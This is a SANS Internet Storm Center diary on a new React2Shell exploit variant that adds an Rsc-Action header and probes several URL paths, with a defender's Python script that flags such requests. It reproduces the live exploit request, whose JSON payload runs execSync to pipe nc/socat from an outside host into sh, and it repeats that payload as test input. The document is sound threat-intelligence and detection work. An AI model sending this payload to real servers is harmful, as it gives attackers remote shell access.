Maybe a Little Bit More Interesting React2Shell Exploit, (Wed, Dec 17th)
A new variant of the React2Shell exploit sends a crafted HTTP request carrying headers such as Rsc-Action and Next-Action and tries several URL paths (/api, /app and others). The vulnerability is triggered through a malicious JSON payload that leads to remote code execution, but the server that would supply follow-up instructions is no longer responding.

2025-12-17 17:12:34 Author: isc.sans.edu

I have already written about various React2Shell exploit attempts we have observed over the last few weeks. New varieties of the exploit keep popping up, and the most recent one uses this particular version of the exploit:

POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: */*
Connection: close

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('\n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|sh\n').toString(); }"}}}}}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--

The overall idea is similar to what we have seen in the past. This version adds the "Rsc-Action" header, which I assume is meant to target sites that expose React Server Components without Next.js. The "Next-Action" header is still present as well. The scans are also attempting different URLs:

/
/api
/app
/api/route
/_next/server
Other exploits have focused on the index page (/). I assume the pool of vulnerable systems is running dry, and attackers are diversifying their exploits a bit. Sadly, the host providing instructions for what to do next (45.153.34.201) is no longer providing these instructions.
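As an added example (not part of the diary, and not code from any React or Next.js project), the following Python script shows how a defender can triage captured requests of this shape: it parses the request line, headers and multipart body, extracts the "$RSC" field, and flags the nested "constructor" key chain and the child_process markers that distinguish the exploit from an ordinary action call. The exploit sample is the request reproduced in the diary above; the second, benign-looking request is constructed for illustration, and the set of suspicious key names is my assumption, not a rule from any vendor.

```python
import json
import re
from typing import Any, Iterator

# Request captured in the diary above, reused here as the sample exploit input.
# The JSON "\n" escapes are doubled so they stay JSON escapes inside this Python string.
CAPTURED_REQUEST = """POST /app HTTP/1.1
Host: 81.187.66.58
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
Next-Action: 0
Rsc-Action: 0
Content-Length: 388
Accept: */*
Connection: close

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

{"0":{"0":{"0":{"constructor":{"constructor":{"constructor":"function() { const {execSync} = require('child_process'); return execSync('\\n(nc 45.153.34.201 65050||socat - tcp:45.153.34.201:65050)|sh\\n').toString(); }"}}}}}}
------WebKitFormBoundary7MA4YWxkTrZu0gW--
"""

# Constructed benign-looking request (not from the diary): it carries an action
# header and a $RSC field but only ordinary data, so the rule should not block it.
BENIGN_REQUEST = """POST / HTTP/1.1
Host: app.example.test
Content-Type: multipart/form-data; boundary=xyz
Next-Action: 7f3a1c
Accept: */*

--xyz
Content-Disposition: form-data; name="$RSC"
Content-Type: application/json

[{"name":"alice","items":[1,2,3]}]
--xyz--
"""

# Assumed indicators: keys that walk the prototype chain, and strings that reach for a shell.
SUSPECT_KEYS = {"constructor", "__proto__", "prototype"}
SHELL_MARKERS = ("child_process", "execSync", "spawnSync")
ACTION_HEADERS = ("next-action", "rsc-action")


def parse_request(raw: str) -> tuple[str, dict[str, str], str]:
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def multipart_fields(headers: dict[str, str], body: str) -> dict[str, str]:
    """Return {field name: field body} for a multipart/form-data body."""
    match = re.search(r'boundary=("?)([^";]+)\1', headers.get("content-type", ""))
    if not match:
        return {}
    delimiter = "--" + match.group(2)
    fields: dict[str, str] = {}
    for part in body.split(delimiter):
        part = part.strip("\n")
        if not part or part == "--":  # preamble or the closing "--" marker
            continue
        part_head, _, part_body = part.partition("\n\n")
        name = re.search(r'name="([^"]*)"', part_head)
        if name:
            fields[name.group(1)] = part_body.rstrip("\n")
    return fields


def suspicious_key_paths(obj: Any, path: tuple = ()) -> Iterator[tuple]:
    """Yield the path of every object key that names a prototype-chain property."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = path + (key,)
            if key in SUSPECT_KEYS:
                yield here
            yield from suspicious_key_paths(value, here)
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from suspicious_key_paths(value, path + (index,))


def string_values(obj: Any) -> Iterator[str]:
    """Yield every string leaf in a decoded JSON document."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from string_values(value)
    elif isinstance(obj, list):
        for value in obj:
            yield from string_values(value)


def inspect_request(raw: str) -> dict[str, Any]:
    """Classify a request as block / watch / allow and report why."""
    request_line, headers, body = parse_request(raw)
    action_headers = [h for h in ACTION_HEADERS if h in headers]
    fields = multipart_fields(headers, body)
    proto_paths: list[str] = []
    shell_markers = False
    if "$RSC" in fields:
        try:
            payload = json.loads(fields["$RSC"])
        except json.JSONDecodeError:
            payload = None
        if payload is not None:
            proto_paths = [".".join(str(p) for p in path) for path in suspicious_key_paths(payload)]
            shell_markers = any(m in s for s in string_values(payload) for m in SHELL_MARKERS)
    if proto_paths or shell_markers:
        verdict = "block"
    elif action_headers and "$RSC" in fields:
        verdict = "watch"
    else:
        verdict = "allow"
    return {
        "path": request_line.split()[1],
        "action_headers": action_headers,
        "proto_paths": proto_paths,
        "shell_markers": shell_markers,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for sample in (CAPTURED_REQUEST, BENIGN_REQUEST):
        print(inspect_request(sample))
```

The key-path check is what matters: a legitimate action payload never needs to name "constructor" as an object key, so the "0.0.0.constructor" chain is a high-confidence signal on its own, and the child_process markers are a second, independent indicator. The "watch" verdict exists so that requests carrying the new Rsc-Action header can be logged for the URL diversification described above without blocking ordinary traffic.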

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Source: https://isc.sans.edu/diary/rss/32578